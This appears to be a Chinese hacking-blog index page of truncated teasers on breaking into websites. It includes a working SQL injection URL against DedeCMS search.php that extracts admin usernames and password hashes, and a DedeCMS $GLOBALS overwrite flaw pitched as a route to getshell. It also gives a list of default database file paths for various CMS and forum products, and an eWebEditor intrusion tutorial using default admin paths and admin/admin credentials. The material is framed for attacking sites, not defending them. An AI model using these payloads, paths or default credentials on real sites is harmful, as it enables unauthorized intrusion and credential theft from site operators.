-
入侵dedecms站 找后台的一些小经验分享
首先: 注入exp 有时候 有些 /plus/目录换成了 /plugins目录 /plugins/search.php?keyword=as&typeArr[111%3D@`\’`) +UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20, 21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+ from+`%23@__admin`%23@`\’`+]=a /plus/search.php?keyword=as&typeArr[111%3D@`\...阅读全文
-
dedecms织梦系统最新版本修改任意管理员漏洞及getshell
此漏洞无视gpc转义,过80sec注入防御。 补充下,不用担心后台找不到。这只是一个demo,都能修改任意数据库了,还怕拿不到SHELL? 起因是全局变量$GLOBALS可以被任意修改,随便看了下,漏洞一堆,我只找了一处。 [php]include/dedesql.class.php if(isset($GLOBALS[‘arrs1’])) { $v1 = $v2 = ”; for($i=0;isset($arrs1[$i]);$i++) { $v1 .= chr($arrs1...阅读全文
-
各种网站数据库默认路径大全
数据库默认路径全揭秘 db/ewebeditor.mdb ewebeditor默认数据库 /database/NewCloud6.mdb 新云管理系统6.0数据库 eWebEditor/admin_login.asp 默认后台 database/article.asp //贫龙文章管理系统 /data/dvbbs7.mdb 动网论坛数据库 7.X /databackup/dvbbs7.mdb 动网论坛默认备份数据库 7.0-7.1 /bbs/databackup/dvbbs7.mdb /admin/data/qcdn_news.mdb 青创文章管理系统数据库...阅读全文
-
利用ewebeditor编辑器入侵网站教程
eWebEditor编辑器 建议最好检测下admin_style.asp文件是否可以直接访问 直接到样式管理 默认后台地址:/ewebeditor/admin_login.asp 默认后台地址:/admin/eWebEditor/Admin_Login.asp 默认后台地址:/admin/WebEditor/Admin_Login.asp 默认后台地址:/admin/Editor/Admin_Login.asp php默认后台地址:taivid_admin/eWebEditor/admin/login.php 使用默认密码:admin/admin 或...阅读全文